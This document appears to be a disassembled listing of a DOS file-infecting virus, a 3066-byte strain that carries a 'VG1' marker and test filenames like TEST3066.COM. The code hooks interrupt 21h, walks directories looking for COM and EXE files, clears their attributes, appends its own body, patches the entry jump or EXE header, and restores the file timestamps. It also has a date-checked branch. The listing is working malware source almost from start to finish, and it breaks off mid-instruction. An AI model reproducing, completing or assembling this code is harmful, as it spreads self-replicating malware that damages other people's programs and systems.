0CD09h ; Data table (indexed access) + ; xref 6FB8:0ADC, 0B5E, 0BA4, 0C67 + ; 0C7B, 0CCB, 0CD4 + db 21h,0B8h, 00h, 4Ch,0CDh, 21h + db 'This program only exists to beco' + + + + + + db 'me infected - COM version', 0Dh, 0Ah + + + + + db '$' + db 8Dh, 16h, 0Dh,0FFh,0FFh, 00h + db 01h, 8Ch +data_56 dw 4D10h ; Data table (indexed access) + ; xref 6FB8:0270, 02DC, 046C +data_57 dw 6FB8h ; Data table (indexed access) + ; xref 6FB8:0276, 02E0, 0470 +data_58 db 0 ; Data table (indexed access) + ; xref 6FB8:0387, 03C8, 0608, 06A4 + db 8Dh, 16h, 0Dh,0FFh,0FFh, 09h + db 0CDh, 21h,0B8h, 00h, 4Ch,0CDh + db '!This program on', 0Dh, 0Ah, '$' + + + + db 27 dup (0) + db 50h, 4Ch, 49h, 43h + db 60 dup (0) + db 01h, 3Fh + db 7 dup (3Fh) + db 43h, 4Fh, 4Dh, 20h, 00h + db 7 dup (0) + db 20h, 96h, 66h,0D7h, 12h, 4Ch + db 00h, 00h, 00h + db 'TSTJ3066.COM' + + db 00h, 00h, 01h, 3Fh + db 10 dup (3Fh) + db 10h, 05h + db 7 dup (0) + db 20h,0E9h, 11h,0B5h, 12h,0F6h + db 48h, 02h, 00h + db 'CAT-TWO.ARC' + + db 00h, 00h, 00h, 00h,0BCh, 0Eh + db 00h, 00h, 20h, 00h, 72h, 49h + db 73h, 12h,0EBh, 04h,0DDh, 0Ch + db 00h, 00h, 00h, 51h, 59h, 8Bh + db 0Fh, 20h, 00h + db 56h, 47h, 31h +loc_5: ; xref 6FB8:0100 + jmp short loc_6 ; (0247) + db 0F5h, 0Bh +loc_6: ; xref 6FB8:0243 + call sub_17 ; (08BB) + call sub_15 ; (0875) + mov ah,19h + int 21h ; DOS Services ah=function 19h + ; get default drive al (0=a:) + mov ds:data_22e[si],si ; (0000:0151=0EAh) + add word ptr ds:data_22e[si],884h ; (0000:0151=0EAh) + mov ds:data_23e[si],cs ; (0000:0153=0A6F0h) + mov ds:data_17e[si],al ; (0000:00E3=1) + call sub_10 ; (076E) + mov dl,ds:data_94e[di] ; (969B:00E2=0) + mov ax,ds + push cs + pop ds + jnz loc_8 ; Jump if not zero + mov data_56[si],984h ; (6FB8:0151=4D10h) + mov data_57[si],ax ; (6FB8:0153=6FB8h) + cmp dl,0FFh + je loc_8 ; Jump if equal + mov ah,0Eh + int 21h ; DOS Services ah=function 0Eh + ; set default drive dl (0=a:) +loc_8: ; xref 6FB8:026E, 027D + mov byte ptr ds:[872h][si],80h ; (6FB8:0872=0FFh) + mov word ptr ds:data_48e[si],0 ; (6FB8:00EF=0) + mov ah,2Ah ; '*' + int 21h ; DOS Services ah=function 2Ah + ; get date, cx=year, dx=mon/day + cmp cx,7C4h + jge loc_9 ; Jump if > or = + jmp short loc_12 ; (02C2) + db 0BDh, 09h,0BCh, 0Eh, 00h +loc_9: ; xref 6FB8:0296 + jg loc_10 ; Jump if > + cmp dh,0Ch + jl loc_12 ; Jump if < + cmp dl,5 + jl loc_12 ; Jump if < + cmp dl,1Ch + jl loc_11 ; Jump if < +loc_10: ; xref 6FB8:029F + mov word ptr ds:[877h][si],0FFDCh ; (6FB8:0877=8EC0h) + mov byte ptr ds:[872h][si],88h ; (6FB8:0872=0FFh) +loc_11: ; xref 6FB8:02AE + cmp byte ptr [si+4],0F8h + nop ;*ASM fixup - displacement + jae loc_13 ; Jump if above or = +loc_12: ; xref 6FB8:0298, 02A4, 02A9, 0356 + mov byte ptr cs:data_47e[si],0 ; (6FB8:00EE=0) + jmp loc_30 ; (0460) + cmp byte ptr [si+4],0F8h + nop ;*ASM fixup - displacement + jae loc_13 ; Jump if above or = + or byte ptr ds:[872h][si],4 ; (6FB8:0872=0FFh) +loc_13: ; xref 6FB8:02C0, 02D0 + mov byte ptr ds:data_38e[si],0 ; (6FB8:00DF=0) + mov dx,data_56[si] ; (6FB8:0151=4D10h) + mov ds,data_57[si] ; (6FB8:0153=6FB8h) + mov ax,4300h + call sub_1 ; (0436) + jc loc_14 ; Jump if carry Set + mov cs:data_51e[si],cx ; (6FB8:00F5=0) + and cl,0FEh + mov ax,4301h + call sub_1 ; (0436) + jc loc_14 ; Jump if carry Set + mov ax,3D02h + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + jc loc_14 ; Jump if carry Set + push cs + pop ds + mov ds:data_48e[si],ax ; (6FB8:00EF=0) + mov bx,ax + mov ax,5700h + int 21h ; DOS Services ah=function 57h + ; get/set file date & time + mov ds:data_49e[si],cx ; (6FB8:00F1=0) + mov ds:data_50e[si],dx ; (6FB8:00F3=0) + dec byte ptr [si+4] + nop ;*ASM fixup - displacement + mov dx,word ptr ds:[880h][si] ; (6FB8:0880=687h) + mov cx,word ptr ds:[882h][si] ; (6FB8:0882=90h) + add dx,4 + nop ;*ASM fixup - sign extn byte + adc cx,0 + mov ax,4200h + int 21h ; DOS Services ah=function 42h + ; move file ptr, cx,dx=offset +loc_14: ; xref 6FB8:02EA, 02FA, 0301 + push cs + pop ds + test byte ptr ds:[872h][si],4 ; (6FB8:0872=0FFh) + jz loc_15 ; Jump if zero + call sub_3 ; (051F) + jmp loc_30 ; (0460) +loc_15: ; xref 6FB8:0337 + xor dl,dl ; Zero register + mov ah,47h ; 'G' + push si + add si,46h + int 21h ; DOS Services ah=function 47h + ; get present dir,drive dl,1=a: + pop si + cmp byte ptr ds:data_47e[si],0 ; (6FB8:00EE=0) + jne loc_16 ; Jump if not equal + call sub_2 ; (0444) + jnc loc_17 ; Jump if carry=0 +loc_16: ; xref 6FB8:034F + jmp loc_12 ; (02C2) +loc_17: ; xref 6FB8:0354, 0433 + mov dx,si + add dx,data_36e ; (6FB8:0087=0) + mov ah,1Ah + int 21h ; DOS Services ah=function 1Ah + ; set DTA to ds:dx + mov word ptr [si+5],2E2Ah + mov word ptr [si+7],4F43h + mov word ptr [si+9],4Dh + mov ah,4Eh ; 'N' + mov dx,si + add dx,5 +loc_18: ; xref 6FB8:03A7 + mov cx,20h + call sub_1 ; (0436) + jc loc_21 ; Jump if carry Set + mov dx,si + add dx,0A5h + mov data_58[si],0 ; (6FB8:0155=0) + call sub_4 ; (0535) + jc loc_20 ; Jump if carry Set + call sub_3 ; (051F) +loc_19: ; xref 6FB8:039C + jmp loc_29 ; (0454) +loc_20: ; xref 6FB8:038F + cmp byte ptr ds:data_20e[si],0 ; (0000:00EE=23h) + jne loc_19 ; Jump if not equal + cmp byte ptr ds:data_24e[si],0 ; (0000:0155=0EAh) + jne loc_25 ; Jump if not equal + mov ah,4Fh ; 'O' + jmp short loc_18 ; (0379) +loc_21: ; xref 6FB8:037F + mov word ptr [si+7],5845h + mov word ptr [si+9],45h + mov ah,4Eh ; 'N' + mov dx,si + add dx,5 +loc_22: ; xref 6FB8:03E9 + mov cx,20h + call sub_1 ; (0436) + jc loc_25 ; Jump if carry Set + mov dx,si + add dx,0A5h + mov data_58[si],0 ; (6FB8:0155=0) + call sub_4 ; (0535) + jc loc_24 ; Jump if carry Set + call sub_3 ; (051F) +loc_23: ; xref 6FB8:03DE + jmp short loc_29 ; (0454) + db 90h +loc_24: ; xref 6FB8:03D0 + cmp byte ptr cs:data_47e[si],0 ; (6FB8:00EE=0) + jne loc_23 ; Jump if not equal + cmp byte ptr ds:data_24e[si],0 ; (0000:0155=0EAh) + jne loc_25 ; Jump if not equal + mov ah,4Fh ; 'O' + jmp short loc_22 ; (03BA) +loc_25: ; xref 6FB8:03A3, 03C0, 03E5 + call sub_2 ; (0444) + mov dx,si + add dx,data_13e ; (0000:00B3=1) + mov ah,1Ah + int 21h ; DOS Services ah=function 1Ah + ; set DTA to ds:dx +loc_26: ; xref 6FB8:0424 + mov ah,4Fh ; 'O' + mov cx,10h + cmp byte ptr ds:data_16e[si],0 ; (0000:00DF=1) + jne loc_27 ; Jump if not equal + mov byte ptr ds:data_16e[si],1 ; (0000:00DF=1) + mov word ptr [si+5],2E2Ah + mov word ptr [si+7],2Ah + mov ah,4Eh ; 'N' + mov dx,si + add dx,5 +loc_27: ; xref 6FB8:0402 + call sub_1 ; (0436) + jc loc_29 ; Jump if carry Set + test byte ptr ds:data_14e[si],10h ; (0000:00C8=0DAh) + jz loc_26 ; Jump if zero + mov dx,si + add dx,data_15e ; (0000:00D1=10h) + mov ah,3Bh ; ';' + call sub_1 ; (0436) + jc loc_29 ; Jump if carry Set + jmp loc_17 ; (0359) + +3066 endp + +; +; SUBROUTINE +; +; Called from: 6FB8:02E7, 02F7, 037C, 03BD, 041A, 042E, 0450 +; 0571, 0582, 058A +; + +sub_1 proc near + int 21h ; DOS Services ah=function 43h + ; get/set file attrb, nam@ds:dx + jc loc_ret_28 ; Jump if carry Set + test byte ptr cs:data_47e[si],0FFh ; (6FB8:00EE=0) + jz loc_ret_28 ; Jump if zero + stc ; Set carry flag + +loc_ret_28: ; xref 6FB8:0438, 0440 + retn +sub_1 endp + + +; +; SUBROUTINE +; +; Called from: 6FB8:0351, 03EB, 0454 +; + +sub_2 proc near + mov word ptr [si+5],5Ch + mov dx,si + add dx,5 + mov ah,3Bh ; ';' + call sub_1 ; (0436) + retn +sub_2 endp + +loc_29: ; xref 6FB8:0394, 03D5, 041D, 0431 + call sub_2 ; (0444) + mov dx,si + add dx,46h + mov ah,3Bh ; ';' + int 21h ; DOS Services ah=function 3Bh + ; set current dir, path @ ds:dx +loc_30: ; xref 6FB8:02C8, 033C + mov bx,ds:data_48e[si] ; (6FB8:00EF=0) + or bx,bx ; Zero ? + jz loc_32 ; Jump if zero + mov cx,ds:data_51e[si] ; (6FB8:00F5=0) + mov dx,data_56[si] ; (6FB8:0151=4D10h) + mov ds,data_57[si] ; (6FB8:0153=6FB8h) + cmp cx,20h + je loc_31 ; Jump if equal + mov ax,4301h + int 21h ; DOS Services ah=function 43h + ; get/set file attrb, nam@ds:dx +loc_31: ; xref 6FB8:0477 + push cs + pop ds + mov cx,ds:data_49e[si] ; (6FB8:00F1=0) + mov dx,ds:data_50e[si] ; (6FB8:00F3=0) + mov ax,5701h + int 21h ; DOS Services ah=function 57h + ; get/set file date & time + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle +loc_32: ; xref 6FB8:0466 + mov dl,ds:data_41e[si] ; (6FB8:00E3=0) + mov ah,0Eh + int 21h ; DOS Services ah=function 0Eh + ; set default drive dl (0=a:) + call sub_16 ; (089A) + pop ax + mov ds:data_39e[si],ax ; (6FB8:00E0=0) + cmp byte ptr [si+3],0FFh + je loc_33 ; Jump if equal + add ax,10h + add [si+2],ax + pop ax + pop ds +;* jmp dword ptr cs:[si] ;*1 entry + db 0FFh, 2Ch +loc_33: ; xref 6FB8:04A5 + call sub_10 ; (076E) + push cs + pop ds + mov ax,[si] + mov word ptr ds:[100h],ax ; (6FB8:0100=40E9h) + mov al,[si+2] + mov byte ptr ds:[102h],al ; (6FB8:0102=1) + jz loc_34 ; Jump if zero + mov bx,ds + add bx,1D0h + mov es,bx + mov di,si + mov dx,si + mov cx,0BFAh + call sub_20 ; (0D32) + mov cx,dx + mov si,dx + dec si + mov di,si + std ; Set direction flag + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + push ds + pop es + mov di,data_93e ; (7188:0100=0) + mov ds,bx + mov si,dx + mov cx,0BFAh + call sub_20 ; (0D32) + mov si,100h + push cs + pop ds + call sub_13 ; (07CD) + mov dx,1D0h +loc_34: ; xref 6FB8:04C2 + mov di,cs + add di,dx + mov word ptr [si+5],100h + mov [si+7],di + pop ax + pop ds + mov ds,di + mov es,di + mov ss,di + xor bx,bx ; Zero register + xor cx,cx ; Zero register + xor bp,bp ; Zero register +;* jmp dword ptr cs:[si+5] ;*1 entry + db 0FFh, 6Ch, 05h +loc_35: ; xref 6FB8:0574, 0585, 058D + mov byte ptr cs:data_47e[si],0 ; (6FB8:00EE=0) + retn + +; +; SUBROUTINE +; +; Called from: 6FB8:0339, 0391, 03D2 +; + +sub_3 proc near + mov bx,ds:data_48e[si] ; (6FB8:00EF=0) + or bx,bx ; Zero ? + jz loc_ret_36 ; Jump if zero + mov dx,si + add dx,data_34e ; (6FB8:0004=0) + nop ;*ASM fixup - sign extn byte + mov cx,1 + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx + +loc_ret_36: ; xref 6FB8:0525 + retn +sub_3 endp + + +; +; SUBROUTINE +; +; Called from: 6FB8:038C, 03CD +; + +sub_4 proc near + push dx + mov ah,19h + int 21h ; DOS Services ah=function 19h + ; get default drive al (0=a:) + add al,41h ; 'A' + mov ah,3Ah ; ':' + mov word ptr ds:[884h][si],ax ; (6FB8:0884=8489h) + mov byte ptr ds:[886h][si],5Ch ; (6FB8:0886=0EAh) '\' + push si + add si,offset ds:[887h] ; (6FB8:0887=0) + mov ah,47h ; 'G' + mov di,si + xor dl,dl ; Zero register + int 21h ; DOS Services ah=function 47h + ; get present dir,drive dl,1=a: + pop si + dec di +loc_37: ; xref 6FB8:055B + inc di + mov al,[di] + or al,al ; Zero ? + jnz loc_37 ; Jump if not zero + pop bx + mov byte ptr [di],5Ch ; '\' + inc di + mov dx,bx +loc_38: ; xref 6FB8:056C + mov al,[bx] + mov [di],al + inc bx + inc di + or al,al ; Zero ? + jnz loc_38 ; Jump if not zero + +; External Entry into Subroutine +; +; Called from: 6FB8:097E + +sub_5: + mov ax,4300h + call sub_1 ; (0436) + jc loc_35 ; Jump if carry Set + mov cs:data_42e[si],cx ; (6FB8:00E4=0) + and cx,0FEh + mov ax,4301h + call sub_1 ; (0436) + jc loc_35 ; Jump if carry Set + mov ax,3D02h + call sub_1 ; (0436) + jc loc_35 ; Jump if carry Set + mov bx,ax + push ds + push dx + call sub_6 ; (05BD) + pop dx + pop ds + pushf ; Push flags + mov cx,cs:data_42e[si] ; (6FB8:00E4=0) + cmp cx,20h + je loc_39 ; Jump if equal + mov ax,4301h + int 21h ; DOS Services ah=function 43h + ; get/set file attrb, nam@ds:dx +loc_39: ; xref 6FB8:05A1 + mov cx,cs:data_43e[si] ; (6FB8:00E6=0) + mov dx,cs:data_44e[si] ; (6FB8:00E8=0) + mov ax,5701h + int 21h ; DOS Services ah=function 57h + ; get/set file date & time + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + popf ; Pop flags + retn +sub_4 endp + + +; +; SUBROUTINE +; +; Called from: 6FB8:0593 +; + +sub_6 proc near + mov ax,5700h + int 21h ; DOS Services ah=function 57h + ; get/set file date & time + push cs + pop ds + mov ds:data_43e[si],cx ; (6FB8:00E6=0) + mov ds:data_44e[si],dx ; (6FB8:00E8=0) + mov dx,si + add dx,0Dh + mov di,dx + mov ah,3Fh ; '?' + mov cx,1Ch + int 21h ; DOS Services ah=function 3Fh + ; read file, cx=bytes, to ds:dx + cmp word ptr [di],5A4Dh + je loc_42 ; Jump if equal + call sub_9 ; (0764) + add ax,0CF5h + jc loc_ret_40 ; Jump if carry Set + cmp byte ptr [di],0E9h + jne loc_41 ; Jump if not equal + mov dx,[di+1] + xor cx,cx ; Zero register + mov ax,4200h + int 21h ; DOS Services ah=function 42h + ; move file ptr, cx,dx=offset + mov dx,di + add dx,1Ch + mov ah,3Fh ; '?' + mov cx,3 + int 21h ; DOS Services ah=function 3Fh + ; read file, cx=bytes, to ds:dx + call sub_7 ; (06AB) + jnc loc_41 ; Jump if carry=0 + mov cs:data_58[si],1 ; (6FB8:0155=0) + +loc_ret_40: ; xref 6FB8:05E6 + retn +loc_41: ; xref 6FB8:05EB, 0606 + call sub_9 ; (0764) + mov word ptr ds:[880h][si],ax ; (6FB8:0880=687h) + mov word ptr ds:[882h][si],dx ; (6FB8:0882=90h) + push ax + mov word ptr [di+3],0FFFFh + mov cx,5 + mov ah,40h ; '@' + mov dx,di + int 21h ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx + mov dx,si + add dx,5 + mov cx,0BF5h + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx + mov ax,4200h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + int 21h ; DOS Services ah=function 42h + ; move file ptr, cx,dx=offset + mov byte ptr [di],0E9h + pop ax + add ax,0F7h + mov [di+1],ax + mov dx,di + mov cx,3 + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx + clc ; Clear carry flag + retn +loc_42: ; xref 6FB8:05DE + cmp word ptr [di+0Ch],0FFFFh + jne loc_43 ; Jump if not equal + push si + mov si,[di+14h] + mov cx,[di+16h] + mov ax,cx + mov cl,ch + xor ch,ch ; Zero register + shr cx,1 ; Shift w/zeros fill + shr cx,1 ; Shift w/zeros fill + shr cx,1 ; Shift w/zeros fill + shr cx,1 ; Shift w/zeros fill + shl ax,1 ; Shift w/zeros fill + shl ax,1 ; Shift w/zeros fill + shl ax,1 ; Shift w/zeros fill + shl ax,1 ; Shift w/zeros fill + add si,ax + adc cx,0 + sub si,3 + sbb cx,0 + mov ax,[di+8] + call sub_8 ; (0751) + add si,ax + adc cx,dx + mov dx,si + pop si + mov ax,4200h + int 21h ; DOS Services ah=function 42h + ; move file ptr, cx,dx=offset + mov dx,di + add dx,1Ch + mov ah,3Fh ; '?' + mov cx,3 + int 21h ; DOS Services ah=function 3Fh + ; read file, cx=bytes, to ds:dx + call sub_7 ; (06AB) + jnc loc_46 ; Jump if carry=0 + mov cs:data_58[si],1 ; (6FB8:0155=0) + retn + +; External Entry into Subroutine +; +; Called from: 6FB8:0603, 069F + +sub_7: + cmp word ptr [di+1Ch],4756h + jne loc_45 ; Jump if not equal + cmp byte ptr [di+1Eh],31h ; '1' + jne loc_45 ; Jump if not equal +loc_43: ; xref 6FB8:0657 + stc ; Set carry flag + +loc_ret_44: ; xref 6FB8:06E0 + retn +loc_45: ; xref 6FB8:06B0, 06B6 + clc ; Clear carry flag + retn +loc_46: ; xref 6FB8:06A2 + call sub_9 ; (0764) + mov word ptr ds:[880h][si],ax ; (6FB8:0880=687h) + mov word ptr ds:[882h][si],dx ; (6FB8:0882=90h) + mov cx,[di+4] + shl cx,1 ; Shift w/zeros fill + xchg ch,cl + mov bp,cx + and bp,0FF00h + xor ch,ch ; Zero register + add bp,[di+6] + adc cx,0 + sub bp,ax + sbb cx,dx + jc loc_ret_44 ; Jump if carry Set + push ax + push dx + push word ptr [di+18h] + mov byte ptr [di+18h],0FFh + mov cx,5 + mov ah,40h ; '@' + mov dx,di + add dx,14h + int 21h ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx + pop word ptr [di+18h] + mov dx,si + add dx,5 + mov cx,0BF5h + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx + mov ax,4200h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + int 21h ; DOS Services ah=function 42h + ; move file ptr, cx,dx=offset + pop word ptr [di+16h] + pop word ptr [di+14h] + add word ptr [di+14h],0FAh + adc word ptr [di+16h],0 + mov ax,[di+8] + call sub_8 ; (0751) + sub [di+14h],ax + sbb [di+16h],dx + mov cl,0Ch + shl word ptr [di+16h],cl ; Shift w/zeros fill + mov ax,0BFAh + add ax,[di+2] + mov [di+2],ax + and word ptr [di+2],1FFh + mov al,ah + xor ah,ah ; Zero register + shr ax,1 ; Shift w/zeros fill + add [di+4],ax + mov dx,di + mov cx,1Ch + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx + clc ; Clear carry flag + retn +sub_6 endp + + +; +; SUBROUTINE +; +; Called from: 6FB8:0684, 0721 +; + +sub_8 proc near + xor dx,dx ; Zero register + shl ax,1 ; Shift w/zeros fill + rcl dx,1 ; Rotate thru carry + shl ax,1 ; Shift w/zeros fill + rcl dx,1 ; Rotate thru carry + shl ax,1 ; Shift w/zeros fill + rcl dx,1 ; Rotate thru carry + shl ax,1 ; Shift w/zeros fill + rcl dx,1 ; Rotate thru carry + retn +sub_8 endp + + +; +; SUBROUTINE +; +; Called from: 6FB8:05E0, 060F, 06BC +; + +sub_9 proc near + xor dx,dx ; Zero register + xor cx,cx ; Zero register + mov ax,4202h + int 21h ; DOS Services ah=function 42h + ; move file ptr, cx,dx=offset + retn +sub_9 endp + + +; +; SUBROUTINE +; +; Called from: 6FB8:0263, 04B2 +; + +sub_10 proc near + xor ax,ax ; Zero register + mov ds,ax + lds di,dword ptr ds:data_11e ; (0000:009C=10BCh) Load 32 bit ptr + lds di,dword ptr [di+1] ; Load 32 bit ptr + mov ax,di + sub di,75Fh + call sub_11 ; (07AB) + jz loc_ret_47 ; Jump if zero + mov di,ax + sub di,755h + call sub_11 ; (07AB) + jz loc_ret_47 ; Jump if zero + lds di,dword ptr ds:data_27e ; (00AE:0080=4EFFh) Load 32 bit ptr + lds di,dword ptr [di+1] ; Load 32 bit ptr + mov ax,di + sub di,676h + call sub_11 ; (07AB) + jz loc_ret_47 ; Jump if zero + mov di,ax + sub di,673h + call sub_11 ; (07AB) + +loc_ret_47: ; xref 6FB8:0782, 078D, 079F + retn +sub_10 endp + + +; +; SUBROUTINE +; +; Called from: 6FB8:077F, 078A, 079C, 07A7 +; + +sub_11 proc near + xor dx,dx ; Zero register + cmp word ptr [di],4756h + jne loc_48 ; Jump if not equal + cmp byte ptr [di+2],31h ; '1' + je loc_49 ; Jump if equal +loc_48: ; xref 6FB8:07B1 + inc dx +loc_49: ; xref 6FB8:07B7 + sub di,0F7h + or dx,dx ; Zero ? + retn +sub_11 endp + + +; +; SUBROUTINE +; +; Called from: 6FB8:07DE, 07E4, 07EA, 07F0, 0864, 086A, 0870 +; + +sub_12 proc near + mov al,0EAh + stosb ; Store al to es:[di] + mov ax,cx + add ax,si + stosw ; Store ax to es:[di] + mov ax,cs + stosw ; Store ax to es:[di] + +loc_ret_50: ; xref 6FB8:07CF + retn +sub_12 endp + + +; +; SUBROUTINE +; +; Called from: 6FB8:04F4 +; + +sub_13 proc near + or dx,dx ; Zero ? + jz loc_ret_50 ; Jump if zero + push ds + push es + mov es,ds:data_39e[si] ; (6FB8:00E0=0) + mov di,data_46e ; (6FB8:00EC=0) + cld ; Clear direction + mov cx,9A8h + call sub_12 ; (07C1) + mov cx,76Ah + call sub_12 ; (07C1) + mov cx,7BEh + call sub_12 ; (07C1) + mov cx,84Ch + call sub_12 ; (07C1) + xor ax,ax ; Zero register + mov ds,ax + cli ; Disable interrupts + mov ax,0ECh + xchg ax,ds:data_3e ; (0000:0070=0FF53h) + mov word ptr cs:[0A88h][si],ax ; (6FB8:0A88=49A0h) + mov ax,es + xchg ax,ds:data_4e ; (0000:0072=0F000h) + mov word ptr cs:[0A8Ah][si],ax ; (6FB8:0A8A=0B904h) + mov ax,0F1h + xchg ax,ds:data_5e ; (0000:0080=1094h) + mov word ptr cs:[76Eh][si],ax ; (6FB8:076E=0C033h) + mov ax,es + xchg ax,ds:data_6e ; (0000:0082=123h) + mov word ptr cs:[770h][si],ax ; (6FB8:0770=0D88Eh) + mov ax,0F6h + xchg ax,ds:data_7e ; (0000:0084=109Eh) + mov word ptr cs:[7DCh][si],ax ; (6FB8:07DC=9A8h) + mov ax,es + xchg ax,ds:data_8e ; (0000:0086=123h) + mov word ptr cs:[7DEh][si],ax ; (6FB8:07DE=0E0E8h) + mov ax,0FBh + xchg ax,ds:data_11e ; (0000:009C=10BCh) + mov word ptr cs:[857h][si],ax ; (6FB8:0857=6C3h) + mov ax,es + xchg ax,word ptr ds:data_11e+2 ; (0000:009E=123h) + mov word ptr cs:[859h][si],ax ; (6FB8:0859=848Eh) + pop es + pop ds + sti ; Enable interrupts + retn +sub_13 endp + + +; +; SUBROUTINE +; +; Called from: 6FB8:08F2 +; + +sub_14 proc near + push es + mov es,word ptr ds:[0E0h][si] ; (0000:00E0=10DAh) + mov di,data_21e ; (0000:00F1=10h) + cld ; Clear direction + mov cx,76Dh + call sub_12 ; (07C1) + mov cx,7E0h + call sub_12 ; (07C1) + mov cx,856h + call sub_12 ; (07C1) + pop es + retn +sub_14 endp + + +; +; SUBROUTINE +; +; Called from: 6FB8:024A, 0938 +; + +sub_15 proc near + push es + xor ax,ax ; Zero register + mov es,ax + mov ax,85Bh + add ax,si + xchg ax,es:data_9e ; (0000:0090=156h) + mov ds:data_18e[si],ax ; (0000:00EA=123h) + mov ax,cs + xchg ax,es:data_10e ; (0000:0092=44Bh) + mov ds:data_19e[si],ax ; (0000:00EC=10DAh) + pop es + mov byte ptr ds:data_20e[si],0 ; (0000:00EE=23h) + retn +sub_15 endp + + +; +; SUBROUTINE +; +; Called from: 6FB8:0499, 0981 +; + +sub_16 proc near + push es + xor ax,ax ; Zero register + mov es,ax + mov ax,cs:data_45e[si] ; (6FB8:00EA=0) + mov es:data_9e,ax ; (0000:0090=156h) + mov ax,cs:data_46e[si] ; (6FB8:00EC=0) + mov es:data_10e,ax ; (0000:0092=44Bh) + pop es + retn +sub_16 endp + + jmp short loc_53 ; (08EA) + nop +;* jmp far ptr loc_2 ;*(029B:136C) + db 0EAh, 6Ch, 13h, 9Bh, 02h + +; +; SUBROUTINE +; +; Called from: 6FB8:0247, 08CB, 08EC, 0935 +; + +sub_17 proc near + pop bx + push ds + push ax + push ds + push cs + pop ds + call sub_18 ; (08C4) + +; External Entry into Subroutine +; +; Called from: 6FB8:08C1 + +sub_18: + pop si + sub si,77Bh + jmp bx ;*Register jump +loc_51: ; xref 6FB8:0918, 091D + call sub_17 ; (08BB) + push cx + mov ax,[si+7] + mov cx,es + cmp ax,cx + pop cx + pop ds + pop ax + jnz loc_52 ; Jump if not zero + push cs + pop es + cmp ah,49h ; 'I' + je loc_52 ; Jump if equal + add bx,1D0h +loc_52: ; xref 6FB8:08D9, 08E0 + pop ds + jmp short loc_55 ; (0924) + db 90h +loc_53: ; xref 6FB8:08B3, 090A, 0913 + xor dx,dx ; Zero register +loc_54: ; xref 6FB8:090F + call sub_17 ; (08BB) + push es + push dx + cli ; Disable interrupts + call sub_14 ; (0858) + sti ; Enable interrupts + pop ax + mov dx,1D0h + add dx,ax + add dx,10h + pop es + pop ds + pop ax + pop ds + mov ah,31h ; '1' + jmp short loc_55 ; (0924) + cmp ah,4Ch ; 'L' + je loc_53 ; Jump if equal + cmp ah,31h ; '1' + je loc_54 ; Jump if equal + or ah,ah ; Zero ? + jz loc_53 ; Jump if zero + cmp ah,49h ; 'I' + je loc_51 ; Jump if equal + cmp ah,4Ah ; 'J' + je loc_51 ; Jump if equal + cmp ah,4Bh ; 'K' + je loc_56 ; Jump if equal +loc_55: ; xref 6FB8:08E7, 0905, 0993 +;* jmp far ptr loc_4 ;*(0E4C:035D) + db 0EAh, 5Dh, 03h, 4Ch, 0Eh + db 80h,0FCh, 4Bh, 75h,0F6h +loc_56: ; xref 6FB8:0922 + push cx + push dx + push es + push bx + push si + push di + push bp + call sub_17 ; (08BB) + call sub_15 ; (0875) +loc_57: ; xref 6FB8:0941, 0949 + sti ; Enable interrupts + test byte ptr ds:data_26e,2 ; (0000:0972=74h) + jnz loc_57 ; Jump if not zero + cli ; Disable interrupts + test byte ptr ds:data_26e,2 ; (0000:0972=74h) + jnz loc_57 ; Jump if not zero + or byte ptr ds:data_26e,2 ; (0000:0972=74h) + pop ds + mov bx,dx + mov byte ptr cs:data_40e[si],0FFh ; (6FB8:00E2=0) + cmp byte ptr [bx+1],3Ah ; ':' + jne loc_58 ; Jump if not equal + mov al,[bx] + or al,20h ; ' ' + sub al,61h ; 'a' + mov cs:data_40e[si],al ; (6FB8:00E2=0) +loc_58: ; xref 6FB8:095D + push si + push di + push es + cld ; Clear direction + mov si,dx + push cs + pop es + mov di,offset ds:[984h] ; (6FB8:0984=2Eh) +loc_59: ; xref 6FB8:0979 + lodsb ; String [si] to al + stosb ; Store al to es:[di] + or al,al ; Zero ? + jnz loc_59 ; Jump if not zero + pop es + pop di + pop si + call sub_5 ; (056E) + call sub_16 ; (089A) + and byte ptr cs:[972h],0FDh ; (6FB8:0972=0BFh) + pop ax + pop ds + pop bp + pop di + pop si + pop bx + pop es + pop dx + pop cx + jmp short loc_55 ; (0924) +sub_17 endp + + db 83h,0C2h, 0Fh,0B1h, 04h,0D3h + db 0EAh,0E9h, 4Dh,0FFh,0EAh,0FEh + db 5Dh, 9Bh, 02h, 56h,0E8h, 00h + db 00h, 5Eh, 81h,0EEh, 5Fh, 08h + db 2Eh, 80h, 8Ch,0EEh, 00h, 01h + db 5Eh, 32h,0C0h,0CFh, 01h, 00h + db 00h, 00h, 8Ah, 00h, 00h, 00h + db 00h, 5Fh,0FEh, 00h, 00h, 00h + db 00h,0B8h, 00h, 00h, 49h, 00h + db 00h, 00h + db 'A:\TEST3066.COM' + + + db 00h, 00h, 00h, 45h, 58h, 45h + db 00h, 45h, 00h + db 143 dup (0) +loc_60: ; xref 6FB8:0AEF + push cx + push ds + push es + push si + push di + push cs + pop es + cld ; Clear direction + test al,20h ; ' ' + jz loc_63 ; Jump if zero + test al,2 + jnz loc_64 ; Jump if not zero + xor ax,ax ; Zero register + mov ds,ax + mov al,ds:data_25e ; (0000:0449=3) + mov cx,0B800h + cmp al,7 + jne loc_61 ; Jump if not equal + mov cx,0B000h + jmp short loc_62 ; (0A9F) +loc_61: ; xref 6FB8:0A90 + cmp al,2 + je loc_62 ; Jump if equal + cmp al,3 + jne loc_64 ; Jump if not equal +loc_62: ; xref 6FB8:0A95, 0A99 + mov word ptr cs:[97Ch],cx ; (6FB8:097C=5E5Fh) + or byte ptr cs:[972h],2 ; (6FB8:0972=0BFh) + mov word ptr cs:[97Eh],0 ; (6FB8:097E=0EDE8h) + mov 